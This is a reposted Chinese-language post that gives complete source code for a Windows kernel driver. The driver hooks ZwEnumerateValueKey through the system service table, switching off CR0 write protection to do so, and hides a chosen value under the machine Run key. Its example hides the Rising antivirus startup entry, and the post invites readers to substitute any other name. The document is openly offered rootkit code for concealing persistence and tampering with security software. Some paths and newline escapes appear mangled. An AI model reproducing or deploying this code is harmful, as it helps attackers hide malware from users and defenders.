轉:簡單的隱藏註冊表索引值的驅動源碼

//簡單的隱藏註冊表索引值的驅動，通過HOOK ZwEnumerateValueKey來實現，這裡把代碼貼出來：:3:<br />#include <ntddk.h><br />#include <stdio.h></p><p>//定義ObQueryNameString<br />NTSYSAPI NTSTATUS NTAPI ObQueryNameString(<br />IN PVOID Object,<br />OUT PVOID ObjectNameInfo,<br />IN ULONG Length,<br />OUT PULONG ReturnLength<br />);</p><p>//定義ZwEnumerateValueKey<br />NTSYSAPI NTSTATUS NTAPI ZwEnumerateValueKey(<br />IN HANDLE KeyHandle,<br />IN ULONG Index,<br />IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,<br />OUT PVOID KeyValueInformation,<br />IN ULONG Length,<br />OUT PULONG ResultLength<br />);</p><p>//定義要Hook的API函數原型<br />NTSTATUS MyZwEnumerateValueKey(<br />IN HANDLE KeyHandle,<br />IN ULONG Index,<br />IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,<br />OUT PVOID KeyValueInformation,<br />IN ULONG Length,<br />OUT PULONG ResultLength<br />); </p><p>//聲明函數指標，並且函數傳回值為NTSTATUS類型<br />typedef NTSTATUS (*REALZWENUMERATEVALUEKEY)(<br />IN HANDLE KeyHandle,<br />IN ULONG Index,<br />IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,<br />OUT PVOID KeyValueInformation,<br />IN ULONG Length,<br />OUT PULONG ResultLength<br />); </p><p>REALZWENUMERATEVALUEKEY RealZwEnumerateValueKey=NULL;</p><p>//這就是要隱藏的索引值，這裡我隱藏的索引值是瑞星殺毒軟體的啟動項，你也可以改成別的<br />PWSTR HideValue=L"RavTray"; </p><p>#pragma pack(1)<br />typedef struct ServiceDescriptorEntry{<br />unsigned int *ServiceTableBase;<br />unsigned int *ServiceCounterTableBase;<br />unsigned int *NumberOfServices;<br />unsigned char *ParamTableBase;<br />}ServiceDescriptorTableEntry_t,*PServiceDescriptorTableEntry_t;<br />#pragma pack() </p><p>_declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;</p><p>#define SYSCALL(_function) KeServiceDescriptorTable.ServiceTableBase[*(PULONG)((PUCHAR)_function+1)] </p><p>NTSTATUS HookApi();<br />NTSTATUS UnHook();<br />PVOID GetPointer(HANDLE handle);<br />NTSTATUS DriverUnload(IN PDRIVER_OBJECT DriverObject);</p><p>PVOID GetPointer(HANDLE handle)<br />{<br />PVOID pKey;<br />if(!handle) return NULL;<br />if (ObReferenceObjectByHandle(handle,0,NULL,KernelMode,&pKey,NULL)!=STATUS_SUCCESS)<br />{<br />pKey=NULL;<br />}<br />return pKey;<br />}</p><p>NTSTATUS MyZwEnumerateValueKey(<br />IN HANDLE KeyHandle,<br />IN ULONG Index,<br />IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,<br />OUT PVOID KeyValueInformation,<br />IN ULONG Length,<br />OUT PULONG ResultLength<br />)<br />{<br />PVOID pKey;<br />UNICODE_STRING *pUniName;<br />ULONG actuallen;<br />UNICODE_STRING uStrValueName;<br />ANSI_STRING keyname;<br />NTSTATUS status;<br />PWSTR ValueName;<br />ULONG NameLen;</p><p>status=((REALZWENUMERATEVALUEKEY)(RealZwEnumerateValueKey))(<br />KeyHandle,<br />Index,<br />KeyValueInformationClass,<br />KeyValueInformation,<br />Length,<br />ResultLength);<br />pKey=GetPointer(KeyHandle); </p><p>if (pKey)<br />{<br />pUniName=ExAllocatePool(NonPagedPool,1024*2);<br />pUniName->MaximumLength=512*2;<br />memset(pUniName,0,pUniName->MaximumLength);<br />if(NT_SUCCESS(ObQueryNameString(pKey,pUniName,512*2,&actuallen)))<br />{<br />RtlUnicodeStringToAnsiString(&keyname,pUniName,TRUE); </p><p>DbgPrint("%ws/n",pUniName->Buffer);<br />keyname.Buffer=_strupr(keyname.Buffer);</p><p>if (strcmp(keyname.Buffer,"//REGISTRY//MACHINE//SOFTWARE//MICROSOFT//WINDOWS//CURRENTVERSION//RUN")==0)<br />{<br />ValueName =((PKEY_VALUE_FULL_INFORMATION)KeyValueInformation)->Name;<br />if (ValueName!=NULL&&wcsstr(ValueName,HideValue)!=NULL)<br />{<br />Index++;<br />ValueName=NULL;<br />return ((REALZWENUMERATEVALUEKEY)(RealZwEnumerateValueKey))(<br />KeyHandle,<br />Index,<br />KeyValueInformationClass,<br />KeyValueInformation,<br />Length,<br />ResultLength);<br />}<br />//DbgPrint("ValueName=%ws/n",ValueName); </p><p>}<br />}<br />}</p><p>return ((REALZWENUMERATEVALUEKEY)(RealZwEnumerateValueKey))(<br />KeyHandle,<br />Index,<br />KeyValueInformationClass,<br />KeyValueInformation,<br />Length,<br />ResultLength);</p><p>}</p><p>NTSTATUS HookApi()<br />{<br />RealZwEnumerateValueKey = (REALZWENUMERATEVALUEKEY)SYSCALL(ZwEnumerateValueKey);<br />_asm{<br />mov eax,cr0<br />and eax,not 10000h<br />mov cr0,eax<br />}</p><p>(REALZWENUMERATEVALUEKEY)SYSCALL(ZwEnumerateValueKey)=MyZwEnumerateValueKey;<br />_asm{</p><p>mov eax,cr0<br />or eax,10000h<br />mov cr0,eax<br />}<br />return( STATUS_SUCCESS );<br />}</p><p>NTSTATUS UnHook()<br />{<br />_asm{<br />mov eax,cr0<br />and eax,not 10000h<br />mov cr0,eax<br />}<br />(REALZWENUMERATEVALUEKEY)SYSCALL(ZwEnumerateValueKey) = RealZwEnumerateValueKey;<br />_asm{ </p><p>mov eax,cr0<br />or eax,10000h<br />mov cr0,eax<br />}<br />return STATUS_SUCCESS ;<br />} </p><p>NTSTATUS DriverUnload(IN PDRIVER_OBJECT DriverObject)<br />{<br />NTSTATUS status;<br />DbgPrint("OnUnload called!/n");<br />status=UnHook();<br />return status;<br />}</p><p>NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject,<br />IN PUNICODE_STRING theRegistryPath)<br />{</p><p>theDriverObject->DriverUnload=DriverUnload;<br />HookApi();<br />DbgPrint("Hook Called!/n");<br />return STATUS_SUCCESS ;<br />}<br />